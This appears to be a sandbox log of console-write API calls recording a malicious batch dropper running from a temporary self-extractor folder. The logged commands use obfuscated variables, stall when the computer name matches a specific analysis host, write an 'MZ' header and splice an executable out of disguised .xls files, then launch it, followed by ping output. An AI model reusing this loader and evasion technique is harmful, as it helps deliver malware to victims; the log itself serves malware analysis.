WriteConsoleW
|
buffer:
Microsoft Windows [Version 6.1.7601]
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set FGtArrZewCy=DESKTOP-
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set fHClkX=QO5QU33
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set QHLPxzFexbITVXNAgqdJbttWoCm=ping %computername% -n
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
if %computername%==%FGtArrZewCy% %QHLPxzFexbITVXNAgqdJbttWoCm% 300
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set mxzjeIoyPsICOotXJGmaQvkOkFNnkp=MZ
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
<nul set /p = "%mxzjeIoyPsICOotXJGmaQvkOkFNnkp%" > Torno.exe.com
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
findstr /V /R "^jZvjHjHxviPgppBDTSaswkcVepFqvVJTGccDaWvLwkekqowEJeUGTSUqEBpnHGXBbWINNYkWcGfPopUUiqsxqrqOAcYRNYtcgBOtmgRKQYljCyScGgdGfCAzVUhaZxobCUBGxPcToGEwTOkc$" Cio.xls >> Torno.exe.com"
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
copy Chiude.xls p
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 file(s) copied.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
start Torno.exe.com p
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
%QHLPxzFexbITVXNAgqdJbttWoCm% 30
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Pinging test22-PC [fe80::4cc:7185:d814:e56e%11]
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
with 32 bytes of data:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from fe80::4cc:7185:d814:e56e%11:
console_handle:
0x00000007
|
1
|
1 |
0
|